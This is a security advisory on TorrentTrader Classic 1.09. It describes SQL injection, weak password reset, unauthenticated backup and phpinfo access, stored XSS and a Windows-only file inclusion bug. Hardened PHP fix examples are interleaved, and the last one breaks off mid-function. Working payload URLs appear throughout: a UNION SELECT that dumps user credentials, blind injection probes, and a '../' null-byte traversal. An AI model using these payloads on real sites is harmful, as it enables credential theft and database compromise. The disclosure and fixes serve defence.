[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09
================================================================================

Author: Janek Vind "waraxe"
Date: 15. June 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-74.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TorrentTrader is a feature-packed and highly customisable PHP/MySQL based
BitTorrent tracker, featuring integrated forums and plenty of administration
options. Please visit www.torrenttrader.org for the support forums.

http://sourceforge.net/projects/torrenttrader


List of found vulnerabilities
================================================================================

1. SQL Injection vulnerability in "account-inbox.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "origmsg" is used in SQL query
Preconditions:
1. attacker must be logged in as valid user

Test:

http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes

Result: "MYSQL Error has occurred!"

-----------------------------[source code start]-------------------------------
if ($msg) {
    $msg = trim($msg);

    $res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver)."");
    $user = mysql_fetch_assoc($res);
    if (!$user)
        $message = "Username not found.";
    ...

    if ($origmsg && $delete == "yes")
        mysql_query("DELETE FROM messages WHERE id=$origmsg") or sqlerr();
-----------------------------[source code end]---------------------------------
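A hardened replacement for the "delete original message" branch above, added here as an example and not TorrentTrader's own code. It assumes a mysqli connection `$db`, the page's `$CURUSER` array, and a `receiver` column in the messages table holding the recipient's user id (assumed schema).

```php
<?php
// Added example, not TorrentTrader's code: hardened "delete original message"
// branch of account-inbox.php. Assumptions: $db is a mysqli connection,
// $curuser is the page's $CURUSER array, and messages.receiver (assumed
// column) holds the recipient's user id.

// Accept only a canonical positive decimal integer as a message id. Strings
// such as "foobar", "1 OR 1=1", "0x1" or "007" return 0 instead of reaching SQL.
function message_id_from_request($raw)
{
    if (!is_string($raw) || $raw === '' || !ctype_digit($raw) || $raw[0] === '0') {
        return 0;
    }
    return (int)$raw;
}

function delete_original_message(mysqli $db, array $curuser, $raw_origmsg, $delete)
{
    if ($delete !== 'yes') {
        return 0;
    }
    $origmsg = message_id_from_request($raw_origmsg);
    if ($origmsg === 0) {
        return 0;
    }
    // Two controls the original lacks: the id is bound as an integer parameter,
    // and the row must belong to the current user, so a logged-in user cannot
    // delete other users' messages by guessing ids.
    $stmt = $db->prepare('DELETE FROM messages WHERE id = ? AND receiver = ?');
    if ($stmt === false) {
        return 0;
    }
    $userid = (int)$curuser['id'];
    $stmt->bind_param('ii', $origmsg, $userid);
    $stmt->execute();
    $deleted = $stmt->affected_rows;
    $stmt->close();
    return $deleted;        // 1 if the message was the caller's, otherwise 0
}

// Usage in account-inbox.php (constructed call):
// $n = delete_original_message($db, $CURUSER, $_GET['origmsg'], $_GET['delete']);
```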


2. Weak password generation algorithm in "account-recover.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. generated password is weak and can be easily brute-forced
Preconditions:
1. attacker must know the email address associated with the target's account

TorrentTrader contains password reset functionality:

http://localhost/torrenttrader109/account-recover.php

Anyone can initiate a password reset; the only condition is that the target's
email address must be known. TorrentTrader checks the email address and, after
successful validation, generates a new temporary password and sends it to that
email address. The autogenerated password appears to be a random number between
10000 and 50000, so basically there can be only 40000 possible temporary
passwords. It is easy to write a brute-force script which tries all possible
password combinations. This process can take a couple of hours or more, but
eventually the password will be guessed and the target account becomes
compromised.

-----------------------------[source code start]-------------------------------
if ($HTTP_SERVER_VARS["REQUEST_METHOD"] == "POST") {
    $email = trim($_POST["email"]);
    if (!validemail($email)) {
        $msg = "" . NOT_VAILD_EMAIL . "";
        $kind = "Error";
    }
    else {
        $res = mysql_query("SELECT * FROM users WHERE email=" . sqlesc($email) . " LIMIT 1");
        $arr = mysql_fetch_assoc($res);

        if (!$arr) {
            $msg = "" . EMAIL_INVALID . "";
            $kind = "Error";
        }
        ...
        if ($arr) {
            $newpassword = rand(10000, 50000);
            $md5pass = md5($newpassword);
-----------------------------[source code end]---------------------------------
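The following is an added example, not code from TorrentTrader: it quantifies the keyspace of `rand(10000, 50000)` against a CSPRNG-generated password and shows how a temporary credential should be stored (slow hash, expiry, forced change). `random_int()` and `password_hash()` are the PHP 7 / 5.5 standard functions; the record layout is assumed.

```php
<?php
// Added example (not TorrentTrader's code): why rand(10000, 50000) is a weak
// temporary password, and what to generate and store instead.

// Keyspace of the original generator: every integer from 10000 to 50000,
// i.e. about 40000 candidates, roughly 15 bits, which an online guesser
// exhausts in hours.
function weak_keyspace_size()
{
    return 50000 - 10000 + 1;
}

// Entropy in bits of a password of $length symbols drawn uniformly from an
// alphabet of $alphabet_size symbols.
function entropy_bits($length, $alphabet_size)
{
    return $length * log($alphabet_size, 2);
}

// Temporary password from a CSPRNG. random_int() exists since PHP 7; on older
// versions use the random_compat polyfill. The alphabet omits 0/O, 1/l/I
// because the user has to type it once; 12 symbols of 55 is about 69 bits.
function generate_temp_password($length = 12)
{
    $alphabet = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789';
    $max = strlen($alphabet) - 1;
    $password = '';
    for ($i = 0; $i < $length; $i++) {
        $password .= $alphabet[random_int(0, $max)];
    }
    return $password;
}

// What gets written to the users row (assumed column names). The original
// stored md5($newpassword): unsalted, fast, and valid until the user changes it.
function temp_password_record($password, $ttl_seconds = 3600)
{
    return array(
        'passhash'    => password_hash($password, PASSWORD_DEFAULT),
        'expires_at'  => time() + $ttl_seconds,   // single short window
        'must_change' => 1,                       // force a real password on login
    );
}

// Login-side check for the record above: expired or already-used temporary
// credentials are rejected before the hash is even compared.
function temp_password_valid(array $record, $candidate, $now = null)
{
    $now = $now === null ? time() : $now;
    if ($record['expires_at'] < $now) {
        return false;
    }
    return password_verify($candidate, $record['passhash']);
}
```

Rate limiting failed logins per account is the complementary control: even a 40000-value keyspace cannot be exhausted online when attempts are throttled.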


3. Unauthorized database backup vulnerability in "backup-database.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. missing access control
Preconditions:
1. mysqldump utility must be available
2. gzip utility must be available
3. target directory must be writable
4. database name must be known in order to successfully guess archive filename

Test:

http://localhost/torrenttrader109/backup-database.php

Resulting message: "Database backup successful, entry inserted into database."

-----------------------------[source code start]-------------------------------
system(sprintf(
    'mysqldump --opt -h %s -u %s -p%s %s | gzip > %s/%s/%s-%s-%s-%s.gz',
    $host,
    $user,
    $pass,
    $db,
    getenv('DOCUMENT_ROOT'),
    $backupdir,
    $db,
    $day,
    $month,
    $year
));
-----------------------------[source code end]---------------------------------

The attacker is able to create a database backup, and the resulting "gz"
archive's filename can be guessed if the attacker knows the database name.
This file is also directly downloadable from the website. Example download URI:

http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz

As a result, information leakage exists. For example, an attacker can fetch
admin credentials from the backed-up database.
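A hardened backup step, added as an example and not TorrentTrader's code. It assumes the page's `adminonly()` helper and `$host`/`$user`/`$pass`/`$db` settings; `$backup_root` is an assumed directory outside the document root, so the archive is never reachable by URL, and the filename gets a random token so knowing the database name is no longer enough to name it.

```php
<?php
// Added example (not TorrentTrader's code) hardening backup-database.php.
// Assumes adminonly() and the $host/$user/$pass/$db settings from the page;
// $backup_root is an assumed directory OUTSIDE the document root.

function backup_archive_basename($db)
{
    // Unpredictable name: date plus 128 bits from a CSPRNG (random_bytes, PHP 7).
    $safe_db = preg_replace('/[^A-Za-z0-9_-]/', '_', $db);
    return $safe_db . '-' . date('Y-m-d') . '-' . bin2hex(random_bytes(16));
}

function run_database_backup($host, $user, $pass, $db, $backup_root)
{
    adminonly();                                       // 1. access control first
    $backup_root = rtrim($backup_root, '/');
    if (!is_dir($backup_root) || !is_writable($backup_root)) {
        return false;
    }
    $sql = $backup_root . '/' . backup_archive_basename($db) . '.sql';

    // 2. Every value is shell-quoted (the original interpolated them raw), and
    //    the password travels through the environment instead of the command
    //    line, where the process list would expose it.
    putenv('MYSQL_PWD=' . $pass);
    $cmd = sprintf('mysqldump --opt -h %s -u %s %s > %s',
        escapeshellarg($host), escapeshellarg($user),
        escapeshellarg($db), escapeshellarg($sql));
    $out = array();
    $rc = 1;
    exec($cmd, $out, $rc);
    putenv('MYSQL_PWD');                               // unset again

    // 3. Two separate commands so each exit status is really checked; with
    //    "mysqldump | gzip" the shell only reports gzip's status, so a failed
    //    or partial dump would still count as "successful".
    if ($rc === 0) {
        exec('gzip -f -- ' . escapeshellarg($sql), $out, $rc);
    }
    $gz = $sql . '.gz';
    if ($rc !== 0 || !is_file($gz) || filesize($gz) === 0) {
        @unlink($sql);
        @unlink($gz);
        return false;
    }
    chmod($gz, 0600);                                  // 4. web user only
    return $gz;                                        // path is never echoed to the client
}
```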


4. SQL Injection vulnerability in "browse.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. uninitialized variable "wherecatin" is used in SQL query
Preconditions:
1. none

Test:

http://localhost/torrenttrader109/browse.php?wherecatin=waraxe

Result:

Unknown column 'waraxe' in 'where clause'

-----------------------------[source code start]-------------------------------
if (count($wherecatina) > 1)
    $wherecatin = implode(",",$wherecatina);
elseif (count($wherecatina) == 1)
    $wherea[] = "category = $wherecatina[0]";
...
if ($wherecatin)
    $where .= ($where ? " AND " : "") . "category IN(" . $wherecatin . ")";

if ($where != "")
    $where = "WHERE $where";

$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error());
-----------------------------[source code end]---------------------------------

This specific SQL injection vulnerability can be exploited using blind attack
methods. If there are one or more active torrents in the database, then the
attack pattern below is usable:

http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1

and the found torrents are shown.

http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1

"No torrents were found based on your search criteria."

In this way the attacker is able to ask boolean questions of the database and
retrieve the needed information bit by bit - an example of classical blind SQL
injection.

If there are no active torrents in the database, then the induced SQL errors
method can be used.

http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1

"Subquery returns more than 1 row"

http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1

"No torrents were found based on your search criteria."


5. Information leakage in "check.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. missing access control
Preconditions:
1. none

Test:

http://localhost/torrenttrader109/check.php

This script is originally meant to be used by the installer and later by
admins. Because of the lacking access control, an attacker is able to use it to
gather useful information about the target system - the full path to the
webroot, file and directory permissions of specific files, and a couple of PHP
settings.

6. SQL Injection vulnerability in "delreq.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "categ" is used in SQL query
Preconditions:
1. attacker must have at least super moderator privileges (user class > 3)
Comments:
1. very easy to exploit

Test:

http://localhost/torrenttrader109/delreq.php?categ=waraxe

Result:

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near
'waraxe order by requests.request LIMIT 0,50' at line 1

Test 2:

http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+

and we can see all usernames, password hashes and emails from the database.


7. SQL Injection vulnerability in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "choice" is used in SQL query
Preconditions:
1. attacker must be logged in as valid user
2. there must exist at least one poll

Testing needs a custom written html form:
-------------------------------------------------------------------------------


-------------------------------------------------------------------------------

Result: "MYSQL Error has occurred!"

-----------------------------[source code start]-------------------------------
if ($_SERVER["REQUEST_METHOD"] == "POST")
{
    $choice = $_POST["choice"];
    if ($CURUSER && $choice != "" && $choice < 256 && $choice == floor($choice))
    {
        $res = mysql_query("SELECT * FROM polls ORDER BY added DESC LIMIT 1") or sqlerr();
        $arr = mysql_fetch_assoc($res) or die("No poll");
        $pollid = $arr["id"];
        $userid = $CURUSER["id"];
        $res = mysql_query("SELECT * FROM pollanswers WHERE pollid=$pollid && userid=$userid") or sqlerr();
        $arr = mysql_fetch_assoc($res);
        if ($arr) die("Dupe vote");
        mysql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr();
-----------------------------[source code end]---------------------------------


8. SQL Injection vulnerability in "modrules.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "id" is used in SQL query
Preconditions:
1. attacker must have at least moderator privileges

Testing needs a custom written html form:
-------------------------------------------------------------------------------


-------------------------------------------------------------------------------

Test result: "MYSQL Error has occurred!"

-----------------------------[source code start]-------------------------------
elseif ($_GET["act"]=="edited"){
    $id = $_POST["id"];
    $title = sqlesc($_POST["title"]);
    $text = sqlesc($_POST["text"]);
    $public = sqlesc($_POST["public"]);
    $class = sqlesc($_POST["class"]);
    mysql_query("update rules set title=$title, text=$text, public=$public,
        class=$class where id=$id") or sqlerr(__FILE__,__LINE__);
-----------------------------[source code end]---------------------------------


9. Information leakage in "phpinfo.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. missing access control
Preconditions:
1. none

Test:

http://localhost/torrenttrader109/phpinfo.php

-----------------------------[source code start]-------------------------------

-----------------------------[source code end]---------------------------------

This script can be used by an attacker to obtain information from the PHP
function phpinfo(). Access to such a script must be limited to admins, but
currently there is no access control at all.


10. SQL Injection vulnerabilities in "report.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "user" is used in SQL query
2. unsanitized user submitted parameter "torrent" is used in SQL query
3. unsanitized user submitted parameter "forumid" is used in SQL query
4. unsanitized user submitted parameter "forumpost" is used in SQL query
Preconditions:
1. attacker must be logged in as valid user

The two proof-of-concept tests below use the parameter "user".

Test 1 needs a custom written html form:
-------------------------------------------------------------------------------


-------------------------------------------------------------------------------

Test result: "MYSQL Error has occurred!"

Test 2 needs a custom written html form:
-----------------------------[source code start]-------------------------------


-----------------------------[source code end]---------------------------------

Test result: "You have already reported user ..."

This is the classical blind SQL injection exploitation method and allows the
attacker to fetch information from the database bit by bit by asking boolean
questions.

The other three SQL injection vulnerabilities in "report.php" involve the user
submitted parameters "torrent", "forumid" and "forumpost", and exploitation can
be done in a similar way as seen above.


11. SQL Injection vulnerability in "take-deletepm.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "delmp" is used in SQL query
Preconditions:
1. attacker must have admin privileges

-----------------------------[source code start]-------------------------------
if(isset($_POST["delmp"])) {
    $do="DELETE FROM messages WHERE id IN (" . implode(", ", $_POST[delmp]) . ")";
    $res=mysql_query($do)
-----------------------------[source code end]---------------------------------


12. SQL Injection vulnerability in "takedelreport.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "delreport" is used in SQL query
Preconditions:
1. attacker must have at least moderator privileges

-----------------------------[source code start]-------------------------------
jmodonly();

$res = mysql_query ("SELECT id FROM reports WHERE dealtwith=0
    AND id IN (" . implode(", ", $_POST[delreport]) . ")");
-----------------------------[source code end]---------------------------------


13. SQL Injection vulnerability in "takedelreq.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "delreq" is used in SQL query
Preconditions:
1. attacker must be logged in as valid user

-----------------------------[source code start]-------------------------------
if (get_user_class() > UC_JMODERATOR){
    ...
    $do="DELETE FROM requests WHERE id IN (" . implode(", ", $_POST[delreq]) . ")";
    $do2="DELETE FROM addedrequests WHERE requestid IN (" . implode(", ", $_POST[delreq]) . ")";
    $res2=mysql_query($do2);
    $res=mysql_query($do);
    ...
} else {
    foreach ($_POST[delreq] as $del_req){
        $delete_ok = checkRequestOwnership($CURUSER[id],$del_req);
        if ($delete_ok){
            $do="DELETE FROM requests WHERE id IN ($del_req)";
            $do2="DELETE FROM addedrequests WHERE requestid IN ($del_req)";
            ...
function checkRequestOwnership ($user, $delete_req){
    $query = mysql_query("SELECT * FROM requests WHERE userid=$user AND id = $delete_req") or sqlerr();
-----------------------------[source code end]---------------------------------



14. SQL Injection vulnerability in "takestaffmess.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "clases" is used in SQL query
Preconditions:
1. attacker must have admin privileges

-----------------------------[source code start]-------------------------------
adminonly();
...
$updateset = $_POST['clases'];

$query = mysql_query("SELECT id FROM users WHERE class IN (".implode(",", $updateset).")");
-----------------------------[source code end]---------------------------------


15. SQL Injection vulnerability in "takewarndisable.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "warndisable" is used in SQL query
Preconditions:
1. attacker must have at least moderator privileges

-----------------------------[source code start]-------------------------------
jmodonly();
...
if ($disable != '') {
    $do="UPDATE users SET enabled='no' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";
    $res=mysql_query($do);
}

if ($enable != '') {
    $do = "UPDATE users SET enabled='yes' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";
    $res = mysql_query($do);
}
-----------------------------[source code end]---------------------------------
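Items 11 to 15 all share one defect: a `$_POST` array is imploded straight into an `IN (...)` list. The helper below is an added example, not TorrentTrader's code; it assumes a mysqli connection `$db` and shows the rewrite for takewarndisable.php and for the non-moderator branch of takedelreq.php, including the empty-list case that `IN ()` would turn into a syntax error.

```php
<?php
// Added example (not TorrentTrader's code): one helper for the "id IN (...)"
// pattern of take-deletepm.php, takedelreport.php, takedelreq.php,
// takestaffmess.php and takewarndisable.php. Assumes $db is a mysqli connection.

// Return the distinct positive integers in a submitted list. Anything else
// ("5 OR 1=1", "0x5", "5.0", "007", nested arrays, a bare string instead of
// an array) is dropped rather than coerced, so the result is safe to interpolate.
function id_list_from_post($raw)
{
    if (!is_array($raw)) {
        return array();
    }
    $ids = array();
    foreach ($raw as $value) {
        if (is_string($value) && $value !== '' && ctype_digit($value) && $value[0] !== '0') {
            $ids[(int)$value] = true;      // keyed, so duplicates collapse
        }
    }
    return array_keys($ids);
}

// "WHERE id IN ()" is a MySQL syntax error, so an empty list yields null and
// the caller must skip the query instead of running it.
function in_clause($column, array $ids)
{
    if (count($ids) === 0) {
        return null;
    }
    return $column . ' IN (' . implode(', ', $ids) . ')';
}

// takewarndisable.php rewritten with the helpers. Returns rows affected.
function set_users_enabled(mysqli $db, array $post, $enable)
{
    $raw = isset($post['warndisable']) ? $post['warndisable'] : null;
    $clause = in_clause('id', id_list_from_post($raw));
    if ($clause === null) {
        return 0;
    }
    $value = $enable ? 'yes' : 'no';       // fixed literals, never user input
    if (!$db->query("UPDATE users SET enabled='$value' WHERE $clause")) {
        return 0;
    }
    return $db->affected_rows;
}

// takedelreq.php, non-moderator branch: ownership is enforced inside the
// DELETE itself, so there is no per-id SELECT that could be bypassed.
function delete_own_requests(mysqli $db, $userid, array $post)
{
    $raw = isset($post['delreq']) ? $post['delreq'] : null;
    $clause = in_clause('id', id_list_from_post($raw));
    if ($clause === null) {
        return 0;
    }
    $userid = (int)$userid;
    if (!$db->query("DELETE FROM requests WHERE userid=$userid AND $clause")) {
        return 0;
    }
    return $db->affected_rows;
}
```

The same `id_list_from_post()` output can be used for the `addedrequests` cleanup in takedelreq.php and the `class IN (...)` list in takestaffmess.php; the access-control helpers (`jmodonly()`, `adminonly()`) stay in place and are a separate control.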


16. SQL Injection vulnerability in "today.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. uninitialized variable "limit" is used in SQL query
Preconditions:
1. none
Comments:
1. seems hard to exploit

Test:

http://localhost/torrenttrader109/today.php?limit=waraxe

Result:

"Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in C:\apache_wwwroot\torrenttrader109\today.php on line 21"


17. SQL Injection vulnerability in "torrents-details.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. uninitialized variable "where" is used in SQL query
Preconditions:
1. none

-----------------------------[source code start]-------------------------------
//speed mod
$resSpeed = mysql_query("SELECT seeders,leechers FROM torrents
    WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15")
    or sqlerr(__FILE__, __LINE__);
-----------------------------[source code end]---------------------------------

Exploitation is possible using blind SQL injection methods.

Test 1:

http://localhost/torrenttrader109/torrents-details.php?id=1&where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+

Result: normal page

Test 2:

http://localhost/torrenttrader109/torrents-details.php?id=1&where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+

Result: "MYSQL Error has occurred!"


18. SQL Injection vulnerability in "admin-delreq.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. uninitialized variable "categ" is used in SQL query
Preconditions:
1. attacker must have at least moderator privileges

-----------------------------[source code start]-------------------------------
jmodonly();
...
$res=mysql_query("SELECT users.username, requests.filled, requests.filledby,
    requests.id, requests.userid, requests.request, requests.added, categories.name
    as cat FROM requests inner join categories on requests.cat = categories.id
    inner join users on requests.userid = users.id
    $categ order by requests.request $limit") or print(mysql_error());
-----------------------------[source code end]---------------------------------

Test:

http://localhost/torrenttrader109/admin-delreq.php?categ=waraxe

Result: "You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use
near 'waraxe order by requests.request LIMIT 0,50' at line 1"
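Items 4, 16, 17 and 18 are the same bug class: with `register_globals=on` a request parameter becomes a PHP global, so a variable the script never assigned (`$wherecatin`, `$limit`, `$where`, `$categ`) is client-controlled by the time it reaches the query. The block below is an added example, not TorrentTrader's code; it rebuilds the browse.php and torrents-details.php query fragments so that every SQL piece is assigned from vetted input (function and column names as on the page, otherwise assumed).

```php
<?php
// Added example (not TorrentTrader's code) for items 4, 16, 17 and 18:
// every SQL fragment is assigned here from vetted input. Turning off
// register_globals (deprecated in PHP 5.3, removed in 5.4) is the root fix;
// this code stays correct either way because nothing is left unassigned.

// browse.php: the category filter is built only from integer category ids.
function category_filter($wherecatina)
{
    $ids = array();
    foreach ((array)$wherecatina as $c) {
        if (is_scalar($c) && ctype_digit((string)$c)) {
            $ids[(int)$c] = true;             // keyed: duplicates collapse
        }
    }
    $ids = array_keys($ids);
    if (count($ids) === 1) {
        return 'category = ' . $ids[0];
    }
    if (count($ids) > 1) {
        return 'category IN(' . implode(',', $ids) . ')';
    }
    return '';                                // no filter, never a request value
}

// today.php / admin-delreq.php: a LIMIT clause is only ever two bounded ints,
// so "?limit=..." from the client can never reach the query text.
function limit_clause($page, $per_page = 50, $max_per_page = 100)
{
    $page = max(0, (int)$page);
    $per_page = min($max_per_page, max(1, (int)$per_page));
    return sprintf('LIMIT %d,%d', $page * $per_page, $per_page);
}

// Fixed conditions are joined here; an empty fragment list yields no WHERE at
// all, so nothing can be prefixed before "visible='yes'" as in item 17.
function where_clause(array $fragments)
{
    $fragments = array_filter($fragments, 'strlen');
    return count($fragments) ? 'WHERE ' . implode(' AND ', $fragments) : '';
}

// browse.php count query (item 4).
function torrents_count_sql($wherecatina)
{
    return rtrim('SELECT COUNT(*) FROM torrents ' .
        where_clause(array(category_filter($wherecatina))));
}

// torrents-details.php "speed mod" query (item 17).
function torrent_speed_sql($id)
{
    $id = (int)$id;
    $where = where_clause(array("visible='yes'", "id = $id"));
    return "SELECT seeders,leechers FROM torrents $where ORDER BY added DESC LIMIT 15";
}

// admin-delreq.php (item 18): the category restriction, if any, is derived
// from an integer, and the LIMIT from limit_clause(); $categ no longer exists.
function admin_delreq_where($cat)
{
    $cat = (int)$cat;
    return $cat > 0 ? where_clause(array("requests.cat = $cat")) : '';
}
```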


19. Persistent XSS in "viewrequests.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameters used in response html generation
Preconditions:
1. attacker must be logged in as valid user

Steps for testing:

a) attacker submits request:

http://localhost/torrenttrader109/requests.php

In the "Title" field let's insert some javascript:

testtitle

b) admin will browse requests:

http://localhost/torrenttrader109/viewrequests.php

and the previously planted javascript will be executed in the admin's session
context.



20. Persistent XSS in logging functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameters used in response html generation
Preconditions:
1. attacker must be logged in as valid user

Steps for testing:

a) attacker uploads torrent file:

http://localhost/torrenttrader109/torrents-upload.php

In the "Torrent Name" field let's insert some javascript:

testname

Upload is successful: "The torrent has been uploaded successfully!"

b) admin will browse logs:

http://localhost/torrenttrader109/admin.php?act=view_log

and the previously planted javascript will be executed in the admin's session
context.


21. Local File Inclusion vulnerability in "backend/admin-functions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. URI case-insensitivity on Windows platform
Preconditions:
1. Windows platform
2. register_globals=on
3. magic_quotes_gpc=off

-----------------------------[source code start]-------------------------------
if (strpos($_SERVER['REQUEST_URI'], "admin-functions.php") !== false) die;
require_once("./themes/" . $GLOBALS['ss_uri'] . "/block.php");
-----------------------------[source code end]---------------------------------

As we can see from the source code snippet above, direct access to the script
is blocked. In the case of a Windows and Apache combination, URI handling is
case-insensitive. On the other hand, the "strpos()" function used for access
control is case-sensitive. So this script can be directly executed if we change
some characters in the script's filename to uppercase:

http://localhost/torrenttrader109/backend/Admin-functions.php

"Warning: require_once(./themes//block.php) [function.require-once]:
failed to open stream: No such file or directory in
C:\apache_wwwroot\torrenttrader109\backend\admin-functions.php on line 3"

If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible:

http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00
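The guard and the include above, reworked as an added example (not TorrentTrader's code): the original `strpos()` check is kept for comparison, the direct-access test is moved off the request URI, and `$ss_uri` is matched against the theme directories that actually exist, which defeats `../` and `%00` regardless of `register_globals` or `magic_quotes_gpc`. The `themes/` directory name is taken from the page; the `IN_TT` constant is assumed.

```php
<?php
// Added example (not TorrentTrader's code): replacing the request-URI guard
// and the theme include of backend/admin-functions.php.

// The original check, reproduced for comparison. On Windows + Apache the file
// is served for "Admin-functions.php", but strpos() is case-sensitive, so the
// guard returns false and execution continues.
function original_guard_blocks($request_uri)
{
    return strpos($request_uri, 'admin-functions.php') !== false;
}

// Replacement 1: compare the script the web server is actually executing
// (SCRIPT_FILENAME, resolved by the server, not typed by the client) with this
// file. Case-insensitive so it also holds on case-insensitive filesystems.
function is_direct_access($this_file, $script_filename)
{
    $a = realpath($this_file);
    $b = realpath($script_filename);
    if ($a === false || $b === false) {
        return true;                        // fail closed
    }
    return strcasecmp($a, $b) === 0;
}
// In admin-functions.php:
//   if (is_direct_access(__FILE__, $_SERVER['SCRIPT_FILENAME'])) { exit; }

// Replacement 2 (simplest): the including page defines a constant and the
// library file refuses to run without it, however the file was reached.
//   define('IN_TT', true);                       // in the including script
//   if (!defined('IN_TT')) { exit; }             // first line of admin-functions.php

// The include itself: $ss_uri must name an existing theme directory. A
// whitelist read from the filesystem means "../../banners.txt%00" can never
// match, and the value is taken from a known source, never from $GLOBALS.
function theme_block_path($themes_dir, $ss_uri)
{
    if (!is_string($ss_uri) || !preg_match('/^[A-Za-z0-9_-]+$/', $ss_uri)) {
        return null;
    }
    $themes_dir = rtrim($themes_dir, '/');
    $dirs = glob($themes_dir . '/*', GLOB_ONLYDIR);
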